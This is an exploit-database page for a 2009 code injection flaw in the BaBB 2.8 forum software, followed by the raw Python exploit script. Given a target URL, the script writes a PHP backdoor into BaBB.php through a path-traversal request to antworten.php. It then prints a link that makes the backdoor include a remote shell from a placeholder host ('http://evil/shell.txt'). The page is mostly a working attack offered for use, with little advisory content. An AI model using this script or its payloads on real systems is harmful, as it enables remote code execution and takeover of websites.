BaBB 2.8 Full Code Injection Exploit

vendor:

BaBB 2.8

by:

Sina Yazdanmehr (R3d.W0rm)

9,3

CVSS

HIGH

Code Injection

CWE

Product Name: BaBB 2.8

Affected Version From: 2.8

Affected Version To: 2.8

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

BaBB 2.8 Full Code Injection Exploit

BaBB 2.8 is vulnerable to a full code injection vulnerability. This vulnerability allows an attacker to inject arbitrary code into the BaBB.php file. This can be exploited to execute arbitrary PHP code by sending a specially crafted HTTP request to the vulnerable script.

Mitigation:

Upgrade to the latest version of BaBB 2.8

Source

Exploit-DB raw data:

#!usr/bin/python
#####################################################################################
####                   BaBB 2.8 Full Code Injection Exploit                      ####
#####################################################################################
#                                                                                   #
#AUTHOR : Sina Yazdanmehr (R3d.W0rm)                                                #
#Discovered by : Sina Yazdanmehr (R3d.W0rm)                                         #
#Our Site : http://IrCrash.com                                                      #
#My Official WebSite : http://R3dW0rm.ir                                            #
#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr)            #
#####################################################################################
#                                                                                   #
#Download : http://sunet.dl.sourceforge.net/project/babb/BaBB%20Full/BaBB%202.8/BaBB_2.8_full.zip
#                                                                                   #
#Dork :  :(                                                                           #
#                                                                                   #
###################################### TNX GOD ######################################
import sys,urllib
if len(sys.argv) < 2 :
    print "Powered by : R3d.W0rm"
    print "http://IrCrash.com - http://R3dW0rm.ir"
    print "Usage : expl.py http://[target]/[path]"
    exit()
data = urllib.urlopen(sys.argv[1] + '/antworten.php?send=true&code=/../../../BaBB.php&name=<?php%20if($_GET[\'t\']==1){include%20$_GET[\'f\'];}/*').read()
if data != '' :
    print "Powered by : R3d.W0rm"
    print "http://IrCrash.com - http://R3dW0rm.ir\n\r"
    print sys.argv[1]  + "/BaBB.php?t=1&f=http://evil/shell.txt"
    exit()
print 'Attack failed.'

# milw0rm.com [2009-08-18]